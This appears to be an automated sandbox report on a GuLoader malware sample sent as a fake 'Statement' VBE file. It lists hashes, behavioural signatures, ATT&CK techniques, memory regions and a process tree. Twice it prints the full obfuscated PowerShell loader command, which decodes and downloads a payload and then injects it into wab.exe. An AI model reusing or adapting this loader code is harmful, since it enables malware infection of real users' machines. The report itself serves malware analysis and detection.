guloader | 9e0eb427595f62fdc31c425b96fcffbedee5420c940a81967b1830f15618326b

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
24-06-2024 15:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Statement 06_24.vbe
Size

23KB
MD5

207b136f41dce4a20ef01071d8358131
SHA1

e5561b3304b7655ff20240631abf1eaa2aff37ef
SHA256

63827bccbd36fabd8120635af4e68329bd834dc0e11c75d4bb81797421cb9d35
SHA512

76b182aeed7902032265434c78b5757db5e7949e360267fb3a5648586eeb25bf12c22ea4520db4f0b114aeb0f9c5976989c53ec94c5c475a3bc103ccaa5c8eb6
SSDEEP

384:nDJcEgWPwf0ulPLLgoylkWz1vAaFYruA/du48nAc55Xid6VKRm3PHAr:nFcEgWIfttLKWs1v9erzdu48Ac55XidH

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

10 4048 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation WScript.exe
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

wab.exe

pid process

4520 wab.exe
4520 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

4668 powershell.exe
4520 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 4668 set thread context of 4520 4668 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4460 4520 WerFault.exe wab.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

4048 powershell.exe
4048 powershell.exe
4668 powershell.exe
4668 powershell.exe
4668 powershell.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

powershell.exe

pid process

4668 powershell.exe
4668 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4048 powershell.exe
Token: SeDebugPrivilege 4668 powershell.exe

flow	pid	process
10	4048	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	WScript.exe

pid	process
4520	wab.exe
4520	wab.exe

pid	process
4668	powershell.exe
4520	wab.exe

description	pid	process	target process
PID 4668 set thread context of 4520	4668	powershell.exe	wab.exe

pid	pid_target	process	target process
4460	4520	WerFault.exe	wab.exe

pid	process
4048	powershell.exe
4048	powershell.exe
4668	powershell.exe
4668	powershell.exe
4668	powershell.exe

pid	process
4668	powershell.exe
4668	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4048	powershell.exe
Token: SeDebugPrivilege	4668	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 3912 wrote to memory of 4048	3912	WScript.exe	powershell.exe
PID 3912 wrote to memory of 4048	3912	WScript.exe	powershell.exe
PID 4048 wrote to memory of 1508	4048	powershell.exe	cmd.exe
PID 4048 wrote to memory of 1508	4048	powershell.exe	cmd.exe
PID 4048 wrote to memory of 4668	4048	powershell.exe	powershell.exe
PID 4048 wrote to memory of 4668	4048	powershell.exe	powershell.exe
PID 4048 wrote to memory of 4668	4048	powershell.exe	powershell.exe
PID 4668 wrote to memory of 4272	4668	powershell.exe	cmd.exe
PID 4668 wrote to memory of 4272	4668	powershell.exe	cmd.exe
PID 4668 wrote to memory of 4272	4668	powershell.exe	cmd.exe
PID 4668 wrote to memory of 4184	4668	powershell.exe	wab.exe
PID 4668 wrote to memory of 4184	4668	powershell.exe	wab.exe
PID 4668 wrote to memory of 4184	4668	powershell.exe	wab.exe
PID 4668 wrote to memory of 4520	4668	powershell.exe	wab.exe
PID 4668 wrote to memory of 4520	4668	powershell.exe	wab.exe
PID 4668 wrote to memory of 4520	4668	powershell.exe	wab.exe
PID 4668 wrote to memory of 4520	4668	powershell.exe	wab.exe
PID 4668 wrote to memory of 4520	4668	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Statement 06_24.vbe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'civilretsdirektoratet Anatexis Kursustids Delegeringerne Sofisme Lufttrafik flankerede Baedekerian Tolket Boyardom';$Pugh = 1;Function Slbemaalene($Wickedness){$Fristil220=$Wickedness.Length-$Pugh;$Skaaltalernes='SUBSTRIN';$Skaaltalernes+='G';For( $Hovedstadens=5;$Hovedstadens -lt $Fristil220;$Hovedstadens+=6){$civilretsdirektoratet+=$Wickedness.$Skaaltalernes.Invoke( $Hovedstadens, $Pugh);}$civilretsdirektoratet;}function Biller($Interstream){ & ($Jvnlig) ($Interstream);}$Descanting=Slbemaalene ' orsiMWorksoPres zImdegiho.dul AflilRendeaFemi./Artis5Bandb.Aute 0prste ,epol(Req.kWLivsfiIndstn Unind Massononraw.zotisAnnua StopaNUvigtTDrosl Ind.i1spr.g0Paris. ,evi0 Yons; Yell Geig.WE,truiAfsminamalg6Gesan4Trans;merel NasutxBesty6 Back4,orha;skitj TubulrTyktavRoma.:til a1S,egr2Hjuls1Seapo.Pha.y0unge )chres HalakGLythreDeklacblac.k enero Efte/R.vac2gange0 Ca.o1 D.sp0G.yph0Murr 1Opera0Ideal1Bread PolitFTuilliDactyrRebuke Loy.fFejlbo OutsxUnder/ Bred1Bounc2Holom1Resun.Spill0Rene. ';$Demonizing=Slbemaalene 'StammUOutfisDoku,eSinger Over-MulslAEnrapgOffereexonenCiviltInten ';$Sofisme=Slbemaalene ' NowhhEnw.atFavr,t UrnfpBagtjsMu,en:try.s/Be,eg/DemonvGastriSeleklTavlelBruskaRe nt- AngivIndpieTacklnUncont,rassuG,rborearshaJuri.. Storc Nodio Akkvm,agko/ BuscPPolytuLedelmS ienpEquideVentisSamort KaffoSkuesp SatspHippoe abon BulkePeng.sBetr .Bind.t Ove,t ,dviflegem ';$Carpenter=Slbemaalene 'K.uns>Branc ';$Jvnlig=Slbemaalene 'drageiAfgane IntexMinde ';$Transcendency='Baedekerian';$svendenes = Slbemaalene 'Nonfee obracBi tahS illo.kift nta%DunkeaDealkpcultip deald ProcaUd.idtSalataIsaac%Theli\ChapeNPropooscuddn HydrrEkvipeSelekcnotifuImmu rBulrurTegumemailln FrantEmbar.UdskyIGypsycTan.ooPiacu Unpro& Skol&Caric So.dee,unkecLarklhBaromoAdo.i M.rbrtC,kel ';Biller (Slbemaalene ',arst$agentgA.sttl ,nteo Sku bDuplia XantlDefra:Agha,PNoncoi TwineReligp DingoDevieuAldo.dRenitr yante Aima=Embed( KorrcEne.gmgl.trdinapp S.om/Fe tlcBened Bic,$ind,ksSvrnsvUnbure .bonnDolladEnemae undenf.rkle k,nnsprocu)Cruet ');Biller (Slbemaalene 'Neuro$DoggigCri.ol.laeooCytombStripa Om vlIndek: LuftDHaloge DetelSel,te ommagJomfreBidrarNefariUnausnPres.gWhisseFlyv,r BarnnapyraeDyspn=Flume$ CuliSLuftvoAf edfF,eebiatkinsBkformNe,rieCambr. Prd sDyrtipLibidl cordi ealltBr el( Guye$AarvaCHalvfaUnlinrIne tpUndere Bilfn CommtBehage NongrBly o) orf ');Biller (Slbemaalene ' Came[NemerN,olane HuistSjlev.malarSKrympeCupp.rryglnvU.ensi icrcKo.tve tortP ,stroDeadwiSla,tnLysidt.aldsMUncataTortinLoka.aPilo.gVokateSa,elrvindi]Ranam:litte:BlddeS hunneBrekrcCagelu ksterPlan.iingentTomtkyRedruP Alfor UltroMetalt te.poLuksucM.nodo RelilUnli S.or=Sev.n ,rlet[SpiseNDamereUrbantCarls.PesetSTempeePragtcFilmku etalrRoameiPytontk.mulyFlangPKosm r ocaloKlisttJ,nekoUnmiscToponoKisellKam,lTShareyPoddipSkilseBarbs]Af.al: I.me:WaddlTO,erdljoeexs Ox.g1Snerl2b.slu ');$Sofisme=$Delegeringerne[0];$Eurolandenes= (Slbemaalene 'Matte$EndotgStunpl.uperoHu,mebTaagnaP edilKaffe: HaarDForehuBrystaFuld.d Kop sBaksg= TurbNUgev eCourawPneum-SandjO StilbRigsdjBdefoe.nddac Ba.btNonde Os,enSObjecyFolkesTotiptFuglee Hendm wast.StartN utfoe ommetUnder. elioW An.seschwab DiplC MilllZoo oiK.keneUdfo nHomunt');$Eurolandenes+=$Piepoudre[1];Biller ($Eurolandenes);Biller (Slbemaalene 'Hakni$ ontiDIndpauK tjeaRavrrdCu.lesPerit.,intiHOplive.okeraAfregdSucceeS.mkrrMaerksSkygg[Nonc,$fodbaDAftapeA nepmReoxyoSpir,nFenc.iHjulezFloraiS rkenGratug F rs]Whees=Jernb$OpponD Marme ,ntes Blr.cSandwageschnFrivot Di.aiS ovenhavregHewet ');$Fordelens=Slbemaalene 'Ove,l$BeklaDSted.uP.lybaAdvokdA.tensUnchr.NonscDHj rdoConstw,agtanScandl ,reyoBa.tua DragdSladrFKommiiSdeb,lElekteHoved(Ty,ek$ Sub,SD.anto Drikf Lejdi Overs VandmRe,ice Brag,inoxi$glat.CBul.eoJ.stmaTids,uVosbetBekrihKultuo OperrSteri)modta ';$Coauthor=$Piepoudre[0];Biller (Slbemaalene 'Tv,ba$HorsrgE alilTekn oExplabR minaKrokel Norm:NougaOBaktevDesi iAnat sDele.mR.gns=Unawa( igfiTOdysseCorrisDatart Ud,a-UnesoPAktiva ,vultUnenrhImpas Bere$MarkeCSukkeo Boa a SemiuStu.et SkglhSmartoP,ivarPo.te)Presh ');while (!$Ovism) {Biller (Slbemaalene 'Tangs$TarsogA.antlChi.koB gbubLyksaaD anelMolly:podosc taldlN.nagoInstiaOmbygc WelfaPreprlUnchaiPartin De.ee.orba= Spha$Pia,ut Pejlr briduOutsteResti ') ;Biller $Fordelens;Biller (Slbemaalene 'OrdaiSAsymptFremmaLicitrAvailtMilla- EfteS StralReagge AstreSlav,pUrg,n Pio,e4 Re r ');Biller (Slbemaalene 'Justi$SubrogCoranl DansoRekonbEpiloaInstilFores:FiltrO Sparv EngaiMytissKnarrmP,ewi=Aspe (BiosyTBidraeJobbes Ov,rtbache-E.omiPPudreaVse.ttScotchZarri Minim$SkageCKemikoforkraInenuuHashitSmearhNonmao rdirElfla)Pauci ') ;Biller (Slbemaalene ' Ern $RundbgSulculO tego B.libUndigaUd.ytlArami:CommaKBlanduImpetrmy losSgelnuBndersBlyantForesiUnfordTryk s Tje,=Inem $Serisg grunlB,cenoSkyggbLinena Di,ylE tra:AtherAJugemnTuberaUnhayt Ent,eUdenlxUnsa,iChiras kkl+Genne+ Pa.d%Ga,en$ BesyD Undse Herrl EkspeSter.gOuttreKrakkrDollaiGaadenSq isgKimo.eForesrFron nG lpeeMem,h.F zzecTovnioFjte.uCombunKvindtInter ') ;$Sofisme=$Delegeringerne[$Kursustids];}$Mulsler=323529;$Gaminesses=29038;Biller (Slbemaalene 'Musik$ Afreg Balel jendo Balab .orbaTimeflIltfa:AffalT Tetro honilstandkVrtsceEmpart Ledd ,acke= U.de DenveGBrndeeCo,cetEmul,-PonceCLit,ro,steonAntiqtBlokbeTrak,nBgenstSubd. No ps$ PhenCggeunoRkkehaMenneu Violt NondhBrudeoWittir Elas ');Biller (Slbemaalene 'Spe.l$Bihu g varmlRatiooDomabbAccipa T.lpl L dd: FortCIslanaO.erdrHertzrIndhoyRe,rotTyveraGracelPreadeHveps Reeki= Anae Epit[ShawmSKonkuyexp.osOp.ostHolm,eAutopmTerap.VinciC Unv,o PhysnAntipvsp,cte Hyper He,rtClype] Arnt:Ac.im:AfvasFFakikr.ndfro.ompemSc llBNonfeaF rhjs Sphae ,eig6Udret4Eel.rSRetratAlumirGengai IlltnJoggigHe,rd(trffe$ NoniT Tidso Usoll Prevk.ypereSlyngt Coun)Yn,ig ');Biller (Slbemaalene 'Moust$Af.nsg TerrlGillooPhilobRejoiaTabellProcl:ExpedBCineraHellkkSqualkAl,mieIronidTremmr AfspaIonicgClo.kso igo1Chass2innu,8demig Furr=Rygdk Fork [unsenSC.ossyBloatsUnwa.tMelanePter mUntra.H,islTNarcoeSh wlxAutolt E de.Diar,Ekalotn OpdacH tero RumfdO.lbeiCyto nThe.eginter]Dim i: unde:bolsjABughiS LatiCDemifIHu anIsemin. res,G Simpe For.tUoverSCar btFortrrLa.geiTraumnfri igLefti(strkb$Svet Cga umaS.bter virerBisttyTimeftPeaceaInte.lHelleeCount)Un la ');Biller (Slbemaalene ' ,egi$AbubbgUnpenl SubsoDigitbExothaBriskl.elel:AugusO,lectvBoatieEpiter.leshs BundcPr,fouChapot KeracStat hWrothe resedForst= omeo$SkrueBtungma ramakenrobk Sidee Kerad ipstr.antsaKeltsg SvigsSymph1uundv2Praed8Biura. DuresBetinuUn rebUnoffsBlan,t sla rK.ntriRkekonsucklg Aton(Nonco$ThinoMProgruPossilTrapesForsglBea,ee Sr rrOutti,Kre.i$VristG.nsplaStormmTilsaiBlindn DukkeBund sDeponsP,dopeJournsM soc)N,kun ');Biller $Overscutched;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4048

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nonrecurrent.Ico && echo t"
3⤵
PID:1508

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'civilretsdirektoratet Anatexis Kursustids Delegeringerne Sofisme Lufttrafik flankerede Baedekerian Tolket Boyardom';$Pugh = 1;Function Slbemaalene($Wickedness){$Fristil220=$Wickedness.Length-$Pugh;$Skaaltalernes='SUBSTRIN';$Skaaltalernes+='G';For( $Hovedstadens=5;$Hovedstadens -lt $Fristil220;$Hovedstadens+=6){$civilretsdirektoratet+=$Wickedness.$Skaaltalernes.Invoke( $Hovedstadens, $Pugh);}$civilretsdirektoratet;}function Biller($Interstream){ & ($Jvnlig) ($Interstream);}$Descanting=Slbemaalene ' orsiMWorksoPres zImdegiho.dul AflilRendeaFemi./Artis5Bandb.Aute 0prste ,epol(Req.kWLivsfiIndstn Unind Massononraw.zotisAnnua StopaNUvigtTDrosl Ind.i1spr.g0Paris. ,evi0 Yons; Yell Geig.WE,truiAfsminamalg6Gesan4Trans;merel NasutxBesty6 Back4,orha;skitj TubulrTyktavRoma.:til a1S,egr2Hjuls1Seapo.Pha.y0unge )chres HalakGLythreDeklacblac.k enero Efte/R.vac2gange0 Ca.o1 D.sp0G.yph0Murr 1Opera0Ideal1Bread PolitFTuilliDactyrRebuke Loy.fFejlbo OutsxUnder/ Bred1Bounc2Holom1Resun.Spill0Rene. ';$Demonizing=Slbemaalene 'StammUOutfisDoku,eSinger Over-MulslAEnrapgOffereexonenCiviltInten ';$Sofisme=Slbemaalene ' NowhhEnw.atFavr,t UrnfpBagtjsMu,en:try.s/Be,eg/DemonvGastriSeleklTavlelBruskaRe nt- AngivIndpieTacklnUncont,rassuG,rborearshaJuri.. Storc Nodio Akkvm,agko/ BuscPPolytuLedelmS ienpEquideVentisSamort KaffoSkuesp SatspHippoe abon BulkePeng.sBetr .Bind.t Ove,t ,dviflegem ';$Carpenter=Slbemaalene 'K.uns>Branc ';$Jvnlig=Slbemaalene 'drageiAfgane IntexMinde ';$Transcendency='Baedekerian';$svendenes = Slbemaalene 'Nonfee obracBi tahS illo.kift nta%DunkeaDealkpcultip deald ProcaUd.idtSalataIsaac%Theli\ChapeNPropooscuddn HydrrEkvipeSelekcnotifuImmu rBulrurTegumemailln FrantEmbar.UdskyIGypsycTan.ooPiacu Unpro& Skol&Caric So.dee,unkecLarklhBaromoAdo.i M.rbrtC,kel ';Biller (Slbemaalene ',arst$agentgA.sttl ,nteo Sku bDuplia XantlDefra:Agha,PNoncoi TwineReligp DingoDevieuAldo.dRenitr yante Aima=Embed( KorrcEne.gmgl.trdinapp S.om/Fe tlcBened Bic,$ind,ksSvrnsvUnbure .bonnDolladEnemae undenf.rkle k,nnsprocu)Cruet ');Biller (Slbemaalene 'Neuro$DoggigCri.ol.laeooCytombStripa Om vlIndek: LuftDHaloge DetelSel,te ommagJomfreBidrarNefariUnausnPres.gWhisseFlyv,r BarnnapyraeDyspn=Flume$ CuliSLuftvoAf edfF,eebiatkinsBkformNe,rieCambr. Prd sDyrtipLibidl cordi ealltBr el( Guye$AarvaCHalvfaUnlinrIne tpUndere Bilfn CommtBehage NongrBly o) orf ');Biller (Slbemaalene ' Came[NemerN,olane HuistSjlev.malarSKrympeCupp.rryglnvU.ensi icrcKo.tve tortP ,stroDeadwiSla,tnLysidt.aldsMUncataTortinLoka.aPilo.gVokateSa,elrvindi]Ranam:litte:BlddeS hunneBrekrcCagelu ksterPlan.iingentTomtkyRedruP Alfor UltroMetalt te.poLuksucM.nodo RelilUnli S.or=Sev.n ,rlet[SpiseNDamereUrbantCarls.PesetSTempeePragtcFilmku etalrRoameiPytontk.mulyFlangPKosm r ocaloKlisttJ,nekoUnmiscToponoKisellKam,lTShareyPoddipSkilseBarbs]Af.al: I.me:WaddlTO,erdljoeexs Ox.g1Snerl2b.slu ');$Sofisme=$Delegeringerne[0];$Eurolandenes= (Slbemaalene 'Matte$EndotgStunpl.uperoHu,mebTaagnaP edilKaffe: HaarDForehuBrystaFuld.d Kop sBaksg= TurbNUgev eCourawPneum-SandjO StilbRigsdjBdefoe.nddac Ba.btNonde Os,enSObjecyFolkesTotiptFuglee Hendm wast.StartN utfoe ommetUnder. elioW An.seschwab DiplC MilllZoo oiK.keneUdfo nHomunt');$Eurolandenes+=$Piepoudre[1];Biller ($Eurolandenes);Biller (Slbemaalene 'Hakni$ ontiDIndpauK tjeaRavrrdCu.lesPerit.,intiHOplive.okeraAfregdSucceeS.mkrrMaerksSkygg[Nonc,$fodbaDAftapeA nepmReoxyoSpir,nFenc.iHjulezFloraiS rkenGratug F rs]Whees=Jernb$OpponD Marme ,ntes Blr.cSandwageschnFrivot Di.aiS ovenhavregHewet ');$Fordelens=Slbemaalene 'Ove,l$BeklaDSted.uP.lybaAdvokdA.tensUnchr.NonscDHj rdoConstw,agtanScandl ,reyoBa.tua DragdSladrFKommiiSdeb,lElekteHoved(Ty,ek$ Sub,SD.anto Drikf Lejdi Overs VandmRe,ice Brag,inoxi$glat.CBul.eoJ.stmaTids,uVosbetBekrihKultuo OperrSteri)modta ';$Coauthor=$Piepoudre[0];Biller (Slbemaalene 'Tv,ba$HorsrgE alilTekn oExplabR minaKrokel Norm:NougaOBaktevDesi iAnat sDele.mR.gns=Unawa( igfiTOdysseCorrisDatart Ud,a-UnesoPAktiva ,vultUnenrhImpas Bere$MarkeCSukkeo Boa a SemiuStu.et SkglhSmartoP,ivarPo.te)Presh ');while (!$Ovism) {Biller (Slbemaalene 'Tangs$TarsogA.antlChi.koB gbubLyksaaD anelMolly:podosc taldlN.nagoInstiaOmbygc WelfaPreprlUnchaiPartin De.ee.orba= Spha$Pia,ut Pejlr briduOutsteResti ') ;Biller $Fordelens;Biller (Slbemaalene 'OrdaiSAsymptFremmaLicitrAvailtMilla- EfteS StralReagge AstreSlav,pUrg,n Pio,e4 Re r ');Biller (Slbemaalene 'Justi$SubrogCoranl DansoRekonbEpiloaInstilFores:FiltrO Sparv EngaiMytissKnarrmP,ewi=Aspe (BiosyTBidraeJobbes Ov,rtbache-E.omiPPudreaVse.ttScotchZarri Minim$SkageCKemikoforkraInenuuHashitSmearhNonmao rdirElfla)Pauci ') ;Biller (Slbemaalene ' Ern $RundbgSulculO tego B.libUndigaUd.ytlArami:CommaKBlanduImpetrmy losSgelnuBndersBlyantForesiUnfordTryk s Tje,=Inem $Serisg grunlB,cenoSkyggbLinena Di,ylE tra:AtherAJugemnTuberaUnhayt Ent,eUdenlxUnsa,iChiras kkl+Genne+ Pa.d%Ga,en$ BesyD Undse Herrl EkspeSter.gOuttreKrakkrDollaiGaadenSq isgKimo.eForesrFron nG lpeeMem,h.F zzecTovnioFjte.uCombunKvindtInter ') ;$Sofisme=$Delegeringerne[$Kursustids];}$Mulsler=323529;$Gaminesses=29038;Biller (Slbemaalene 'Musik$ Afreg Balel jendo Balab .orbaTimeflIltfa:AffalT Tetro honilstandkVrtsceEmpart Ledd ,acke= U.de DenveGBrndeeCo,cetEmul,-PonceCLit,ro,steonAntiqtBlokbeTrak,nBgenstSubd. No ps$ PhenCggeunoRkkehaMenneu Violt NondhBrudeoWittir Elas ');Biller (Slbemaalene 'Spe.l$Bihu g varmlRatiooDomabbAccipa T.lpl L dd: FortCIslanaO.erdrHertzrIndhoyRe,rotTyveraGracelPreadeHveps Reeki= Anae Epit[ShawmSKonkuyexp.osOp.ostHolm,eAutopmTerap.VinciC Unv,o PhysnAntipvsp,cte Hyper He,rtClype] Arnt:Ac.im:AfvasFFakikr.ndfro.ompemSc llBNonfeaF rhjs Sphae ,eig6Udret4Eel.rSRetratAlumirGengai IlltnJoggigHe,rd(trffe$ NoniT Tidso Usoll Prevk.ypereSlyngt Coun)Yn,ig ');Biller (Slbemaalene 'Moust$Af.nsg TerrlGillooPhilobRejoiaTabellProcl:ExpedBCineraHellkkSqualkAl,mieIronidTremmr AfspaIonicgClo.kso igo1Chass2innu,8demig Furr=Rygdk Fork [unsenSC.ossyBloatsUnwa.tMelanePter mUntra.H,islTNarcoeSh wlxAutolt E de.Diar,Ekalotn OpdacH tero RumfdO.lbeiCyto nThe.eginter]Dim i: unde:bolsjABughiS LatiCDemifIHu anIsemin. res,G Simpe For.tUoverSCar btFortrrLa.geiTraumnfri igLefti(strkb$Svet Cga umaS.bter virerBisttyTimeftPeaceaInte.lHelleeCount)Un la ');Biller (Slbemaalene ' ,egi$AbubbgUnpenl SubsoDigitbExothaBriskl.elel:AugusO,lectvBoatieEpiter.leshs BundcPr,fouChapot KeracStat hWrothe resedForst= omeo$SkrueBtungma ramakenrobk Sidee Kerad ipstr.antsaKeltsg SvigsSymph1uundv2Praed8Biura. DuresBetinuUn rebUnoffsBlan,t sla rK.ntriRkekonsucklg Aton(Nonco$ThinoMProgruPossilTrapesForsglBea,ee Sr rrOutti,Kre.i$VristG.nsplaStormmTilsaiBlindn DukkeBund sDeponsP,dopeJournsM soc)N,kun ');Biller $Overscutched;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4668

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nonrecurrent.Ico && echo t"
4⤵
PID:4272

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:4184

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 1476
5⤵
- Program crash
PID:4460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4520 -ip 4520
1⤵
PID:2280

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fdag5ecv.zfl.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Nonrecurrent.Ico
Filesize
459KB

MD5
7bde273b0e89cce409bfd8e956bce2e3

SHA1
51c6a2cd985fd8e63adfcdcb89664eabccb281e3

SHA256
6335e461d35c53f4881932605e98cf70fabe79ba484b317cd3d7a517f8efa94d

SHA512
ab02fa0045cb6834cf74d30d8d4d2b0f501d9361d512f72e7aebd09ea43a0b5e2ee90ae3a8383510f6ca96a5a9a0dd2f71b154eb5723ff96757ae1e2495420b8

Download Submit
memory/4048-1-0x000001C115000000-0x000001C115022000-memory.dmp

Filesize
136KB

Download
memory/4048-11-0x00007FF9F7B50000-0x00007FF9F8611000-memory.dmp

Filesize
10.8MB

Download
memory/4048-12-0x00007FF9F7B50000-0x00007FF9F8611000-memory.dmp

Filesize
10.8MB

Download
memory/4048-0-0x00007FF9F7B53000-0x00007FF9F7B55000-memory.dmp

Filesize
8KB

Download
memory/4048-48-0x00007FF9F7B50000-0x00007FF9F8611000-memory.dmp

Filesize
10.8MB

Download
memory/4048-40-0x00007FF9F7B50000-0x00007FF9F8611000-memory.dmp

Filesize
10.8MB

Download
memory/4048-39-0x00007FF9F7B53000-0x00007FF9F7B55000-memory.dmp

Filesize
8KB

Download
memory/4520-51-0x0000000000C00000-0x0000000006995000-memory.dmp

Filesize
93.6MB

Download
memory/4520-45-0x0000000000C00000-0x0000000006995000-memory.dmp

Filesize
93.6MB

Download
memory/4668-16-0x0000000005150000-0x0000000005778000-memory.dmp

Filesize
6.2MB

Download
memory/4668-30-0x0000000005FF0000-0x000000000600E000-memory.dmp

Filesize
120KB

Download
memory/4668-32-0x0000000007850000-0x0000000007ECA000-memory.dmp

Filesize
6.5MB

Download
memory/4668-33-0x0000000006580000-0x000000000659A000-memory.dmp

Filesize
104KB

Download
memory/4668-34-0x00000000072B0000-0x0000000007346000-memory.dmp

Filesize
600KB

Download
memory/4668-35-0x0000000007240000-0x0000000007262000-memory.dmp

Filesize
136KB

Download
memory/4668-36-0x0000000008480000-0x0000000008A24000-memory.dmp

Filesize
5.6MB

Download
memory/4668-31-0x0000000006020000-0x000000000606C000-memory.dmp

Filesize
304KB

Download
memory/4668-38-0x0000000008A30000-0x000000000E7C5000-memory.dmp

Filesize
93.6MB

Download
memory/4668-29-0x0000000005A30000-0x0000000005D84000-memory.dmp

Filesize
3.3MB

Download
memory/4668-19-0x00000000059C0000-0x0000000005A26000-memory.dmp

Filesize
408KB

Download
memory/4668-18-0x0000000005950000-0x00000000059B6000-memory.dmp

Filesize
408KB

Download
memory/4668-17-0x00000000057B0000-0x00000000057D2000-memory.dmp

Filesize
136KB

Download
memory/4668-15-0x00000000026E0000-0x0000000002716000-memory.dmp

Filesize
216KB

Download